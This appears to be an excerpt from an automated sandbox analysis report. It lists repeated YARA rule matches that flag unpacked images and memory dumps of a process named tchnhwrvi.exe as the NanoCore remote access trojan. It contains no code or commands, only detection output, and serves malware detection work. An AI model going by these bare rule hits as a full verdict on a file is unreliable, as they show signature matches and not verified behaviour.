      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.3404f78.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75e0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.34257fc.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7620000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.762e8a4.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75d0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.7620000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75f0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.3404f78.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.5e10000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.43bc350.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.75b0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4efd95f.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.33ae240.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.34111c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
